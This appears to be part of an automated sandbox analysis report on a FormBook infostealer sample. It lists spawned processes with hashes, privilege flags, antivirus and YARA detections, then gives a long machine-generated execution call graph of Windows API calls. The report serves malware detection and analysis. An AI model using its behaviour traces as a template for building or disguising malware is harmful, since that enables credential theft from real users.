                                                          MD5 hash:AB4B4378DE9DEF8797AA78370F33CFD7
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:19:00:44
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\uG3I84bQEr.exe"
                                                          Imagebase:0x8c0000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:19:00:45
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\System32\alg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\alg.exe
                                                          Imagebase:0x140000000
                                                          File size:1'594'368 bytes
                                                          MD5 hash:EB607CDF7D5BB12D72F7C0C992646A55
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:19:01:03
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe"
                                                          Imagebase:0xdd0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:19:01:05
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                          Imagebase:0x5a0000
                                                          File size:186'880 bytes
                                                          MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:19:01:32
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff728280000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:3.9%
                                                            Dynamic/Decrypted Code Coverage:8.2%
                                                            Signature Coverage:9%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:57
                                                            execution_graph 109616 441de4 GetTempPathW 109617 441e01 109616->109617 109617->109617 109618 43fe27 109631 41f944 109618->109631 109620 43fe3d 109621 43fe53 109620->109621 109622 43febe 109620->109622 109720 409e5d 60 API calls 109621->109720 109640 40fce0 109622->109640 109624 43fe92 109626 44089c 109624->109626 109627 43fe9a 109624->109627 109722 469e4a 89 API calls 4 library calls 109626->109722 109721 46834f 59 API calls Mailbox 109627->109721 109630 43feb2 Mailbox 109630->109630 109632 41f950 109631->109632 109633 41f962 109631->109633 109723 409d3c 60 API calls Mailbox 109632->109723 109635 41f991 109633->109635 109636 41f968 109633->109636 109734 409d3c 60 API calls Mailbox 109635->109734 109724 420db6 109636->109724 109639 41f95a 109639->109620 109763 408180 109640->109763 109642 40fd3d 109643 4106f6 109642->109643 109644 44472d 109642->109644 109768 40f234 109642->109768 109885 469e4a 89 API calls 4 library calls 109643->109885 109886 469e4a 89 API calls 4 library calls 109644->109886 109648 444742 109649 44488d 109649->109648 109652 40fe4c 109649->109652 109892 47a2d9 85 API calls Mailbox 109649->109892 109650 40fe3e 109650->109649 109650->109652 109890 4566ec 59 API calls 2 library calls 109650->109890 109651 410517 109658 420db6 Mailbox 59 API calls 109651->109658 109660 4448f9 109652->109660 109707 444b53 109652->109707 109772 40837c 109652->109772 109653 4447d7 109653->109648 109888 469e4a 89 API calls 4 library calls 109653->109888 109668 410545 _memmove 109658->109668 109659 444848 109891 4560ef 59 API calls 2 library calls 109659->109891 109669 444917 109660->109669 109894 4085c0 59 API calls Mailbox 109660->109894 109664 444755 109664->109653 109887 40f6a3 341 API calls 109664->109887 109665 44486b 109671 409ea0 341 API calls 109665->109671 109666 4448b2 Mailbox 109666->109652 109893 4566ec 59 API calls 2 library calls 109666->109893 109675 420db6 Mailbox 59 API calls 109668->109675 109674 444928 109669->109674 109895 4085c0 59 API calls Mailbox 109669->109895 109670 40fea4 109678 444ad6 109670->109678 109679 40ff32 109670->109679 109714 410179 Mailbox _memmove 109670->109714 109671->109649 109672 420db6 59 API calls Mailbox 109682 40fdd3 109672->109682 109674->109714 109896 4560ab 59 API calls Mailbox 109674->109896 109718 410106 _memmove 109675->109718 109905 469ae7 60 API calls 109678->109905 109680 420db6 Mailbox 59 API calls 109679->109680 109684 40ff39 109680->109684 109682->109648 109682->109650 109682->109651 109682->109664 109682->109668 109682->109672 109695 44480c 109682->109695 109860 409ea0 109682->109860 109684->109643 109779 4109d0 109684->109779 109686 444a4d 109687 409ea0 341 API calls 109686->109687 109689 444a87 109687->109689 109689->109648 109900 4084c0 109689->109900 109691 40ffb2 109691->109643 109691->109668 109698 40ffe6 109691->109698 109889 469e4a 89 API calls 4 library calls 109695->109889 109697 444ab2 109904 469e4a 89 API calls 4 library calls 109697->109904 109704 410007 109698->109704 109906 408047 109698->109906 109703 420db6 59 API calls Mailbox 109703->109714 109704->109643 109706 444b24 109704->109706 109711 41004c 109704->109711 109705 410398 109705->109630 109910 409d3c 60 API calls Mailbox 109706->109910 109707->109648 109911 469e4a 89 API calls 4 library calls 109707->109911 109709 4100d8 109856 409d3c 60 API calls Mailbox 109709->109856 109711->109643 109711->109707 109711->109709 109712 444a1c 109715 420db6 Mailbox 59 API calls 109712->109715 109713 4100eb 109713->109643 109857 4082df 59 API calls Mailbox 109713->109857 109714->109643 109714->109686 109714->109697 109714->109703 109714->109705 109714->109712 109858 408740 68 API calls __cinit 109714->109858 109859 408660 68 API calls 109714->109859 109897 465937 68 API calls 109714->109897 109898 4089b3 69 API calls Mailbox 109714->109898 109899 409d3c 60 API calls Mailbox 109714->109899 109715->109686 109718->109714 109719 410162 109718->109719 109884 409c90 59 API calls Mailbox 109718->109884 109719->109630 109720->109624 109721->109630 109722->109630 109723->109639 109725 420dbe 109724->109725 109727 420dd8 109725->109727 109729 420ddc std::exception::exception 109725->109729 109735 42571c 109725->109735 109752 4233a1 DecodePointer 109725->109752 109727->109639 109753 42859b RaiseException 109729->109753 109731 420e06 109754 4284d1 58 API calls _free 109731->109754 109733 420e18 109733->109639 109734->109639 109736 425797 109735->109736 109741 425728 109735->109741 109761 4233a1 DecodePointer 109736->109761 109738 42579d 109762 428b28 58 API calls __getptd_noexit 109738->109762 109742 42575b RtlAllocateHeap 109741->109742 109744 425733 109741->109744 109746 425783 109741->109746 109750 425781 109741->109750 109758 4233a1 DecodePointer 109741->109758 109742->109741 109743 42578f 109742->109743 109743->109725 109744->109741 109755 42a16b 58 API calls 2 library calls 109744->109755 109756 42a1c8 58 API calls 7 library calls 109744->109756 109757 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109744->109757 109759 428b28 58 API calls __getptd_noexit 109746->109759 109760 428b28 58 API calls __getptd_noexit 109750->109760 109752->109725 109753->109731 109754->109733 109755->109744 109756->109744 109758->109741 109759->109750 109760->109743 109761->109738 109762->109743 109764 40818f 109763->109764 109767 4081aa 109763->109767 109912 407e4f 109764->109912 109766 408197 CharUpperBuffW 109766->109767 109767->109642 109769 40f251 109768->109769 109770 40f272 109769->109770 109916 469e4a 89 API calls 4 library calls 109769->109916 109770->109682 109773 40838d 109772->109773 109774 43edbd 109772->109774 109775 420db6 Mailbox 59 API calls 109773->109775 109776 408394 109775->109776 109777 4083b5 109776->109777 109917 408634 59 API calls Mailbox 109776->109917 109777->109660 109777->109670 109780 444cc3 109779->109780 109794 4109f5 109779->109794 109980 469e4a 89 API calls 4 library calls 109780->109980 109782 410cfa 109782->109691 109785 410ee4 109785->109782 109787 410ef1 109785->109787 109786 410a4b PeekMessageW 109844 410a05 Mailbox 109786->109844 109978 411093 341 API calls Mailbox 109787->109978 109789 410ef8 LockWindowUpdate DestroyWindow GetMessageW 109789->109782 109792 410f2a 109789->109792 109791 444e81 Sleep 109791->109844 109795 445c58 TranslateMessage DispatchMessageW GetMessageW 109792->109795 109793 410ce4 109793->109782 109977 411070 10 API calls Mailbox 109793->109977 109794->109844 109981 409e5d 60 API calls 109794->109981 109982 456349 341 API calls 109794->109982 109795->109795 109797 445c88 109795->109797 109797->109782 109798 444d50 TranslateAcceleratorW 109800 410e43 PeekMessageW 109798->109800 109798->109844 109799 409e5d 60 API calls 109799->109844 109800->109844 109801 410ea5 TranslateMessage DispatchMessageW 109801->109800 109802 44581f WaitForSingleObject 109806 44583c GetExitCodeProcess CloseHandle 109802->109806 109802->109844 109804 420db6 59 API calls Mailbox 109804->109844 109805 410d13 timeGetTime 109805->109844 109839 410f95 109806->109839 109807 410e5f Sleep 109840 410e70 Mailbox 109807->109840 109808 408047 59 API calls 109808->109844 109810 445af8 Sleep 109810->109840 109813 410f4e timeGetTime 109979 409e5d 60 API calls 109813->109979 109814 42049f timeGetTime 109814->109840 109817 445b8f GetExitCodeProcess 109820 445ba5 WaitForSingleObject 109817->109820 109821 445bbb CloseHandle 109817->109821 109819 40b7dd 109 API calls 109819->109840 109820->109821 109820->109844 109821->109840 109824 485f25 110 API calls 109824->109840 109825 445874 109825->109839 109826 445078 Sleep 109826->109844 109827 445c17 Sleep 109827->109844 109833 409ea0 314 API calls 109833->109844 109836 40fce0 314 API calls 109836->109844 109839->109691 109840->109814 109840->109817 109840->109819 109840->109824 109840->109825 109840->109826 109840->109827 109840->109839 109840->109844 110007 407667 109840->110007 110012 462408 60 API calls 109840->110012 110013 409e5d 60 API calls 109840->110013 110014 407de1 109840->110014 110018 4089b3 69 API calls Mailbox 109840->110018 110019 40b73c 341 API calls 109840->110019 110020 4564da 60 API calls 109840->110020 110021 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109840->110021 110022 463c55 66 API calls Mailbox 109840->110022 109841 407de1 59 API calls 109841->109844 109842 469e4a 89 API calls 109842->109844 109844->109786 109844->109791 109844->109793 109844->109798 109844->109799 109844->109800 109844->109801 109844->109802 109844->109804 109844->109805 109844->109807 109844->109808 109844->109810 109844->109813 109844->109833 109844->109836 109844->109839 109844->109840 109844->109841 109844->109842 109845 409c90 59 API calls Mailbox 109844->109845 109846 4084c0 69 API calls 109844->109846 109847 40b73c 314 API calls 109844->109847 109849 45617e 59 API calls Mailbox 109844->109849 109850 4455d5 VariantClear 109844->109850 109851 456e8f 59 API calls 109844->109851 109852 44566b VariantClear 109844->109852 109853 408cd4 59 API calls Mailbox 109844->109853 109854 445419 VariantClear 109844->109854 109855 4089b3 69 API calls 109844->109855 109918 40e420 109844->109918 109925 40e6a0 109844->109925 109956 40f460 109844->109956 109976 4031ce IsDialogMessageW GetClassLongW 109844->109976 109983 486018 59 API calls 109844->109983 109984 469a15 59 API calls Mailbox 109844->109984 109985 45d4f2 59 API calls 109844->109985 109986 409837 109844->109986 110004 4560ef 59 API calls 2 library calls 109844->110004 110005 408401 59 API calls 109844->110005 110006 4082df 59 API calls Mailbox 109844->110006 109845->109844 109846->109844 109847->109844 109849->109844 109850->109844 109851->109844 109852->109844 109853->109844 109854->109844 109855->109844 109856->109713 109857->109718 109858->109714 109859->109714 109861 409ebf 109860->109861 109882 409eed Mailbox 109860->109882 109862 420db6 Mailbox 59 API calls 109861->109862 109862->109882 109863 40b47a 109869 4409e5 109863->109869 109870 440055 109863->109870 109864 40b475 109865 408047 59 API calls 109864->109865 109866 40a057 109865->109866 109866->109682 109867 456e8f 59 API calls 109867->109882 109868 420db6 59 API calls Mailbox 109868->109882 111427 469e4a 89 API calls 4 library calls 109869->111427 111424 469e4a 89 API calls 4 library calls 109870->111424 109871 407667 59 API calls 109871->109882 109875 440064 109875->109682 109876 422d40 67 API calls __cinit 109876->109882 109877 408047 59 API calls 109877->109882 109880 4409d6 111426 469e4a 89 API calls 4 library calls 109880->111426 109882->109863 109882->109864 109882->109866 109882->109867 109882->109868 109882->109870 109882->109871 109882->109876 109882->109877 109882->109880 109883 40a55a 109882->109883 111422 40c8c0 341 API calls 2 library calls 109882->111422 111423 40b900 60 API calls Mailbox 109882->111423 111425 469e4a 89 API calls 4 library calls 109883->111425 109884->109718 109885->109644 109886->109648 109887->109653 109888->109648 109889->109648 109890->109659 109891->109665 109892->109666 109893->109666 109894->109669 109895->109674 109896->109714 109897->109714 109898->109714 109899->109714 109902 4084cb 109900->109902 109901 4084f2 109901->109697 109902->109901 111428 4089b3 69 API calls Mailbox 109902->111428 109904->109648 109905->109698 109907 408052 109906->109907 109908 40805a 109906->109908 109909 407f77 59 API calls 109907->109909 109908->109704 109909->109908 109910->109707 109911->109648 109913 407e62 109912->109913 109915 407e5f _memmove 109912->109915 109914 420db6 Mailbox 59 API calls 109913->109914 109914->109915 109915->109766 109916->109770 109917->109777 109919 40e451 109918->109919 109920 40e43d 109918->109920 110024 469e4a 89 API calls 4 library calls 109919->110024 110023 40df00 341 API calls 2 library calls 109920->110023 109923 40e448 109923->109844 109924 443aa4 109924->109924 109926 40e6d5 109925->109926 109927 443aa9 109926->109927 109930 40e73f 109926->109930 109939 40e799 109926->109939 109928 409ea0 341 API calls 109927->109928 109929 443abe 109928->109929 109955 40e970 Mailbox 109929->109955 110029 469e4a 89 API calls 4 library calls 109929->110029 109933 407667 59 API calls 109930->109933 109930->109939 109931 407667 59 API calls 109931->109939 109934 443b04 109933->109934 110030 422d40 109934->110030 109935 422d40 __cinit 67 API calls 109935->109939 109936 443b26 109936->109844 109938 4084c0 69 API calls 109938->109955 109939->109931 109939->109935 109939->109936 109940 40e95a 109939->109940 109939->109955 109940->109955 110033 469e4a 89 API calls 4 library calls 109940->110033 109942 469e4a 89 API calls 109942->109955 109943 408d40 59 API calls 109943->109955 109946 409ea0 341 API calls 109946->109955 109951 40f195 110037 469e4a 89 API calls 4 library calls 109951->110037 109953 443e25 109953->109844 109954 40ea78 109954->109844 109955->109938 109955->109942 109955->109943 109955->109946 109955->109951 109955->109954 110025 407f77 109955->110025 110034 456e8f 59 API calls 109955->110034 110035 47c5c3 341 API calls 109955->110035 110036 47b53c 341 API calls Mailbox 109955->110036 110038 409c90 59 API calls Mailbox 109955->110038 110039 4793c6 341 API calls Mailbox 109955->110039 109957 40f650 109956->109957 109958 40f4ba 109956->109958 109959 407de1 59 API calls 109957->109959 109960 40f4c6 109958->109960 109961 44441e 109958->109961 109967 40f58c Mailbox 109959->109967 110118 40f290 109960->110118 110235 47bc6b 109961->110235 109964 44442c 109968 40f630 109964->109968 110275 469e4a 89 API calls 4 library calls 109964->110275 109966 40f4fd 109966->109964 109966->109967 109966->109968 110133 47df37 109967->110133 110136 463c37 109967->110136 110139 404e4a 109967->110139 110145 46cb7a 109967->110145 110225 47445a 109967->110225 109968->109844 109970 40f5e3 109970->109968 110234 409c90 59 API calls Mailbox 109970->110234 109976->109844 109977->109785 109978->109789 109979->109844 109980->109794 109981->109794 109982->109794 109983->109844 109984->109844 109985->109844 109987 409851 109986->109987 109996 40984b 109986->109996 109988 43f5d3 __i64tow 109987->109988 109989 409857 __itow 109987->109989 109990 409899 109987->109990 109994 43f4da 109987->109994 109993 420db6 Mailbox 59 API calls 109989->109993 111420 423698 83 API calls 4 library calls 109990->111420 109995 409871 109993->109995 109997 420db6 Mailbox 59 API calls 109994->109997 110002 43f552 Mailbox _wcscpy 109994->110002 109995->109996 109998 407de1 59 API calls 109995->109998 109996->109844 109999 43f51f 109997->109999 109998->109996 110000 420db6 Mailbox 59 API calls 109999->110000 110001 43f545 110000->110001 110001->110002 110003 407de1 59 API calls 110001->110003 111421 423698 83 API calls 4 library calls 110002->111421 110003->110002 110004->109844 110005->109844 110006->109844 110008 420db6 Mailbox 59 API calls 110007->110008 110009 407688 110008->110009 110010 420db6 Mailbox 59 API calls 110009->110010 110011 407696 110010->110011 110011->109840 110012->109840 110013->109840 110015 407df0 __NMSG_WRITE _memmove 110014->110015 110016 420db6 Mailbox 59 API calls 110015->110016 110017 407e2e 110016->110017 110017->109840 110018->109840 110019->109840 110020->109840 110021->109840 110022->109840 110023->109923 110024->109924 110027 407f87 110025->110027 110028 407f9a _memmove 110025->110028 110026 420db6 Mailbox 59 API calls 110026->110028 110027->110026 110027->110028 110028->109955 110029->109955 110040 422c44 110030->110040 110032 422d4b 110032->109939 110033->109955 110034->109955 110035->109955 110036->109955 110037->109953 110038->109955 110039->109955 110041 422c50 __initptd 110040->110041 110048 423217 110041->110048 110047 422c77 __initptd 110047->110032 110065 429c0b 110048->110065 110050 422c59 110051 422c88 DecodePointer DecodePointer 110050->110051 110052 422c65 110051->110052 110053 422cb5 110051->110053 110062 422c82 110052->110062 110053->110052 110111 4287a4 59 API calls 2 library calls 110053->110111 110055 422d18 EncodePointer EncodePointer 110055->110052 110056 422cec 110056->110052 110060 422d06 EncodePointer 110056->110060 110113 428864 61 API calls 2 library calls 110056->110113 110057 422cc7 110057->110055 110057->110056 110112 428864 61 API calls 2 library calls 110057->110112 110060->110055 110061 422d00 110061->110052 110061->110060 110114 423220 110062->110114 110066 429c2f EnterCriticalSection 110065->110066 110067 429c1c 110065->110067 110066->110050 110072 429c93 110067->110072 110069 429c22 110069->110066 110096 4230b5 58 API calls 3 library calls 110069->110096 110073 429c9f __initptd 110072->110073 110074 429cc0 110073->110074 110075 429ca8 110073->110075 110081 429ce1 __initptd 110074->110081 110100 42881d 58 API calls 2 library calls 110074->110100 110097 42a16b 58 API calls 2 library calls 110075->110097 110077 429cad 110098 42a1c8 58 API calls 7 library calls 110077->110098 110080 429cd5 110083 429ceb 110080->110083 110084 429cdc 110080->110084 110081->110069 110082 429cb4 110099 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 110082->110099 110086 429c0b __lock 58 API calls 110083->110086 110101 428b28 58 API calls __getptd_noexit 110084->110101 110088 429cf2 110086->110088 110090 429d17 110088->110090 110091 429cff 110088->110091 110103 422d55 110090->110103 110102 429e2b InitializeCriticalSectionAndSpinCount 110091->110102 110094 429d0b 110109 429d33 LeaveCriticalSection _doexit 110094->110109 110097->110077 110098->110082 110100->110080 110101->110081 110102->110094 110104 422d87 _free 110103->110104 110105 422d5e RtlFreeHeap 110103->110105 110104->110094 110105->110104 110106 422d73 110105->110106 110110 428b28 58 API calls __getptd_noexit 110106->110110 110108 422d79 GetLastError 110108->110104 110109->110081 110110->110108 110111->110057 110112->110056 110113->110061 110117 429d75 LeaveCriticalSection 110114->110117 110116 422c87 110116->110047 110117->110116 110119 40f43a 110118->110119 110121 40f2bc 110118->110121 110277 469e4a 89 API calls 4 library calls 110119->110277 110121->110119 110130 40f2f9 _memmove 110121->110130 110122 40f3d3 110123 40f3e3 110122->110123 110276 47a2d9 85 API calls Mailbox 110122->110276 110123->109966 110125 420db6 59 API calls Mailbox 110125->110130 110126 4443f9 110279 40f6a3 341 API calls 110126->110279 110128 409ea0 341 API calls 110128->110130 110129 4443a9 110129->109966 110130->110122 110130->110125 110130->110126 110130->110128 110130->110129 110131 4443ab 110130->110131 110278 469e4a 89 API calls 4 library calls 110131->110278 110280 47cadd 110133->110280 110135 47df47 110135->109970 110412 46445a GetFileAttributesW 110136->110412 110140 404e54 110139->110140 110141 404e5b 110139->110141 110416 4253a6 110140->110416 110143 404e6a 110141->110143 110144 404e7b FreeLibrary 110141->110144 110143->109970 110144->110143 110146 407667 59 API calls 110145->110146 110147 46cbaf 110146->110147 110148 407667 59 API calls 110147->110148 110149 46cbb8 110148->110149 110150 46cbcc 110149->110150 110882 409b3c 59 API calls 110149->110882 110152 409837 84 API calls 110150->110152 110153 46cbe9 110152->110153 110154 46ccea 110153->110154 110155 46cc0b 110153->110155 110160 46cd1a Mailbox 110153->110160 110686 404ddd 110154->110686 110156 409837 84 API calls 110155->110156 110158 46cc17 110156->110158 110161 408047 59 API calls 110158->110161 110160->109970 110164 46cc23 110161->110164 110168 46cc37 110164->110168 110169 46cc69 110164->110169 110171 408047 59 API calls 110168->110171 110172 409837 84 API calls 110169->110172 110174 46cc47 110171->110174 110175 46cc76 110172->110175 110883 407cab 110174->110883 110178 408047 59 API calls 110175->110178 110182 46cc82 110178->110182 110890 464a31 GetFileAttributesW 110182->110890 110184 409837 84 API calls 110188 46cc5d 110184->110188 110186 46cc8b 110189 46cc9e 110186->110189 110192 4079f2 59 API calls 110186->110192 110191 407b2e 59 API calls 110188->110191 110194 409837 84 API calls 110189->110194 110200 46cca4 110189->110200 110191->110169 110192->110189 110196 46cccb 110194->110196 110891 4637ef 75 API calls Mailbox 110196->110891 110200->110160 110226 409837 84 API calls 110225->110226 110227 474494 110226->110227 111355 406240 110227->111355 110229 4744a4 110230 4744c9 110229->110230 110231 409ea0 341 API calls 110229->110231 110233 4744cd 110230->110233 111380 409a98 110230->111380 110231->110230 110233->109970 110234->109970 110236 47bc96 110235->110236 110237 47bcb0 110235->110237 111412 469e4a 89 API calls 4 library calls 110236->111412 111413 47a213 59 API calls Mailbox 110237->111413 110240 47bcbb 110241 409ea0 340 API calls 110240->110241 110242 47bd1c 110241->110242 110243 47bca8 Mailbox 110242->110243 110244 47bdae 110242->110244 110247 47bd5d 110242->110247 110243->109964 110245 47be04 110244->110245 110246 47bdb4 110244->110246 110245->110243 110248 409837 84 API calls 110245->110248 111415 46791a 59 API calls 110246->111415 111414 4672df 59 API calls Mailbox 110247->111414 110249 47be16 110248->110249 110252 407e4f 59 API calls 110249->110252 110256 47be3a CharUpperBuffW 110252->110256 110253 47bdd7 111416 405d41 59 API calls Mailbox 110253->111416 110255 47bd8d 110258 40f460 340 API calls 110255->110258 110259 47be54 110256->110259 110257 47bddf Mailbox 110262 40fce0 340 API calls 110257->110262 110258->110243 110260 47bea7 110259->110260 110261 47be5b 110259->110261 110263 409837 84 API calls 110260->110263 111417 4672df 59 API calls Mailbox 110261->111417 110262->110243 110264 47beaf 110263->110264 111418 409e5d 60 API calls 110264->111418 110267 47be89 110268 40f460 340 API calls 110267->110268 110268->110243 110269 47beb9 110269->110243 110270 409837 84 API calls 110269->110270 110271 47bed4 110270->110271 111419 405d41 59 API calls Mailbox 110271->111419 110273 47bee4 110274 40fce0 340 API calls 110273->110274 110274->110243 110275->109968 110276->110123 110277->110129 110278->110129 110279->110129 110281 409837 84 API calls 110280->110281 110282 47cb1a 110281->110282 110298 47cb61 Mailbox 110282->110298 110318 47d7a5 110282->110318 110284 47cdb9 110285 47cf2e 110284->110285 110289 47cdc7 110284->110289 110368 47d8c8 92 API calls Mailbox 110285->110368 110288 47cf3d 110288->110289 110291 47cf49 110288->110291 110331 47c96e 110289->110331 110290 409837 84 API calls 110297 47cbb2 Mailbox 110290->110297 110291->110298 110296 47ce00 110346 420c08 110296->110346 110297->110284 110297->110290 110297->110298 110350 47fbce 59 API calls 2 library calls 110297->110350 110351 47cfdf 61 API calls 2 library calls 110297->110351 110298->110135 110301 47ce33 110353 4092ce 110301->110353 110302 47ce1a 110352 469e4a 89 API calls 4 library calls 110302->110352 110305 47ce25 GetCurrentProcess TerminateProcess 110305->110301 110310 47cfa4 110310->110298 110314 47cfb8 FreeLibrary 110310->110314 110311 47ce6b 110365 47d649 107 API calls _free 110311->110365 110314->110298 110317 47ce7c 110317->110310 110366 408d40 59 API calls Mailbox 110317->110366 110367 409d3c 60 API calls Mailbox 110317->110367 110369 47d649 107 API calls _free 110317->110369 110319 407e4f 59 API calls 110318->110319 110320 47d7c0 CharLowerBuffW 110319->110320 110370 45f167 110320->110370 110324 407667 59 API calls 110325 47d7f9 110324->110325 110377 40784b 110325->110377 110327 47d810 110390 407d2c 110327->110390 110329 47d81c Mailbox 110330 47d858 Mailbox 110329->110330 110394 47cfdf 61 API calls 2 library calls 110329->110394 110330->110297 110332 47c989 110331->110332 110336 47c9de 110331->110336 110333 420db6 Mailbox 59 API calls 110332->110333 110334 47c9ab 110333->110334 110335 420db6 Mailbox 59 API calls 110334->110335 110334->110336 110335->110334 110337 47da50 110336->110337 110338 47dc79 Mailbox 110337->110338 110342 47da73 _strcat _wcscpy __NMSG_WRITE 110337->110342 110338->110296 110339 409be6 59 API calls 110339->110342 110340 409b3c 59 API calls 110340->110342 110341 409b98 59 API calls 110341->110342 110342->110338 110342->110339 110342->110340 110342->110341 110343 42571c 58 API calls __crtCompareStringA_stat 110342->110343 110344 409837 84 API calls 110342->110344 110401 465887 61 API calls 2 library calls 110342->110401 110343->110342 110344->110342 110348 420c1d 110346->110348 110347 420cb5 VirtualProtect 110349 420c83 110347->110349 110348->110347 110348->110349 110349->110301 110349->110302 110350->110297 110351->110297 110352->110305 110354 4092d6 110353->110354 110355 420db6 Mailbox 59 API calls 110354->110355 110357 4092e4 110355->110357 110356 4092f0 110359 409050 110356->110359 110357->110356 110402 4091fc 59 API calls Mailbox 110357->110402 110403 409160 110359->110403 110361 420db6 Mailbox 59 API calls 110363 4090fb 110361->110363 110362 40905f 110362->110361 110362->110363 110363->110317 110364 408d40 59 API calls Mailbox 110363->110364 110364->110311 110365->110317 110366->110317 110367->110317 110368->110288 110369->110317 110372 45f192 __NMSG_WRITE 110370->110372 110371 45f1d1 110371->110324 110371->110329 110372->110371 110373 45f278 110372->110373 110376 45f1c7 110372->110376 110373->110371 110396 4078c4 61 API calls 110373->110396 110376->110371 110395 4078c4 61 API calls 110376->110395 110378 4078b7 110377->110378 110379 40785a 110377->110379 110380 407d2c 59 API calls 110378->110380 110379->110378 110381 407865 110379->110381 110386 407888 _memmove 110380->110386 110382 407880 110381->110382 110383 43eb09 110381->110383 110397 407f27 59 API calls Mailbox 110382->110397 110398 408029 110383->110398 110386->110327 110387 43eb13 110388 420db6 Mailbox 59 API calls 110387->110388 110389 43eb33 110388->110389 110391 407d3a 110390->110391 110393 407d43 _memmove 110390->110393 110392 407e4f 59 API calls 110391->110392 110391->110393 110392->110393 110393->110329 110394->110330 110395->110376 110396->110373 110397->110386 110399 420db6 Mailbox 59 API calls 110398->110399 110400 408033 110399->110400 110400->110387 110401->110342 110402->110356 110404 409169 Mailbox 110403->110404 110405 43f19f 110404->110405 110410 409173 110404->110410 110407 420db6 Mailbox 59 API calls 110405->110407 110406 40917a 110406->110362 110408 43f1ab 110407->110408 110410->110406 110411 409c90 59 API calls Mailbox 110410->110411 110411->110410 110413 463c3e 110412->110413 110414 464475 FindFirstFileW 110412->110414 110413->109970 110414->110413 110415 46448a FindClose 110414->110415 110415->110413 110417 4253b2 __initptd 110416->110417 110418 4253c6 110417->110418 110419 4253de 110417->110419 110451 428b28 58 API calls __getptd_noexit 110418->110451 110425 4253d6 __initptd 110419->110425 110429 426c11 110419->110429 110421 4253cb 110452 428db6 9 API calls __cftof_l 110421->110452 110425->110141 110430 426c43 EnterCriticalSection 110429->110430 110431 426c21 110429->110431 110434 4253f0 110430->110434 110431->110430 110432 426c29 110431->110432 110433 429c0b __lock 58 API calls 110432->110433 110433->110434 110435 42533a 110434->110435 110436 425349 110435->110436 110437 42535d 110435->110437 110497 428b28 58 API calls __getptd_noexit 110436->110497 110439 425359 110437->110439 110454 424a3d 110437->110454 110453 425415 LeaveCriticalSection LeaveCriticalSection _fseek 110439->110453 110440 42534e 110498 428db6 9 API calls __cftof_l 110440->110498 110447 425377 110471 430a02 110447->110471 110449 42537d 110449->110439 110450 422d55 _free 58 API calls 110449->110450 